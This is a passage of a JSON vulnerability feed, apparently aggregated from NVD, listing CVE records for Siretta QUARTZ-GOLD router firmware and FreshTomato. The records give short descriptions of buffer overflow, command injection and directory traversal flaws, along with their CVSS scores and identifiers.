"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "prion", "title": "CVE-2022-40222", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-40222"], "modified": "2023-02-02T17:20:00", "id": "PRION:CVE-2022-40222", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-40222", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-15T19:28:04", "description": "A stack-based buffer overflow vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "prion", "title": "CVE-2022-36279", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-36279"], "modified": "2023-02-02T17:23:00", "id": "PRION:CVE-2022-36279", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-36279", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-15T19:57:57", "description": "A stack-based buffer overflow vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "prion", "title": "CVE-2022-38459", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-38459"], "modified": "2023-02-02T17:22:00", "id": "PRION:CVE-2022-38459", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-38459", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-15T19:57:53", "description": "A directory traversal vulnerability exists in the httpd update.cgi functionality of FreshTomato 2022.5. A specially crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-01-30T11:15:00", "type": "prion", "title": "CVE-2022-38451", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-38451"], "modified": "2023-02-06T21:53:00", "id": "PRION:CVE-2022-38451", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-38451", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-08-15T20:04:26", "description": "A file write vulnerability exists in the httpd upload.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "prion", "title": "CVE-2022-39045", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-39045"], "modified": "2023-02-02T17:21:00", "id": "PRION:CVE-2022-39045", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-39045", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-15T19:53:41", "description": "An OS command injection vulnerability exists in the httpd SNMP functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP response can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "prion", "title": "CVE-2022-38066", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-38066"], "modified": "2023-02-02T17:22:00", "id": "PRION:CVE-2022-38066", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-38066", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-15T21:49:13", "description": "Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer overflow is in the function that manages the '(ddns1|ddns2) hostname WORD' command template.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "prion", "title": "CVE-2022-40985", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-40985"], "modified": "2023-02-03T16:27:00", "id": "PRION:CVE-2022-40985", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-40985", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-15T22:04:09", "description": "Several OS command injection vulnerabilities exist in the m2m binary of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger these vulnerabilities.This command injection is reachable through the m2m's DOWNLOAD_CFG_FILE command", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "prion", "title": "CVE-2022-42490", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-42490"], "modified": "2023-02-06T17:28:00", "id": "PRION:CVE-2022-42490", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-42490", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-15T22:04:10", "description": "Several OS command injection vulnerabilities exist in the m2m binary of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger these vulnerabilities.This command injection is reachable through the m2m's DOWNLOAD_INFO command.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "prion", "title": "CVE-2022-42493", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-42493"], "modified": "2023-02-06T17:28:00", "id": "PRION:CVE-2022-42493", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-42493", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-15T21:49:24", "description": "Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer overflow is in the function that manages the 'no wlan filter mac address WORD descript WORD' command template.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "prion", "title": "CVE-2022-41030", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41030"], "modified": "2023-02-06T17:29:00", "id": "PRION:CVE-2022-41030", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-41030", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-15T21:36:41", "description": "A directory traversal vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file deletion. An attacker can send an HTTP request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2023-01-26T22:15:00", "type": "prion", "title": "CVE-2022-40701", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-40701"], "modified": "2023-02-02T17:19:00", "id": "PRION:CVE-2022-40701", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-40701", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:P"}}, {"lastseen": "2023-08-15T21:49:05", "description": "An os command injection vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "prion", "title": "CVE-2022-40969", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-40969"], "modified": "2023-02-02T17:42:00", "id": "PRION:CVE-2022-40969", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-40969", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-15T21:49:47", "description": "A directory traversal vulnerability exists in the m2m DELETE_FILE cmd functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary file deletion. An attacker can send a network request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2023-01-26T22:15:00", "type": "prion", "title": "CVE-2022-41154", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41154"], "modified": "2023-02-06T17:29:00", "id": "PRION:CVE-2022-41154", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-41154", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-08-15T21:59:33", "description": "A heap-based buffer overflow vulnerability exists in the m2m DELETE_FILE cmd functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "prion", "title": "CVE-2022-41991", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41991"], "modified": "2023-02-06T17:28:00", "id": "PRION:CVE-2022-41991", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-41991", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-06-03T15:06:20", "description": "Several OS command injection vulnerabilities exist in the m2m binary of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger these vulnerabilities.This command injection is reachable through the m2m's DOWNLOAD_CFG_FILE command", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "cve", "title": "CVE-2022-42490", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-42490"], "modified": "2023-02-06T17:28:00", "cpe": ["cpe:/o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020"], "id": "CVE-2022-42490", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-42490", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T15:00:50", "description": "An OS command injection vulnerability exists in the m2m DELETE_FILE cmd functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "cve", "title": "CVE-2022-40222", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-40222"], "modified": "2023-02-02T17:20:00", "cpe": ["cpe:/o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020"], "id": "CVE-2022-40222", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-40222", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T15:02:39", "description": "An os command injection vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "cve", "title": "CVE-2022-40969", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-40969"], "modified": "2023-02-02T17:42:00", "cpe": ["cpe:/o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020"], "id": "CVE-2022-40969", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-40969", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:55:38", "description": "A directory traversal vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-01-26T22:15:00", "type": "cve", "title": "CVE-2022-38088", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, 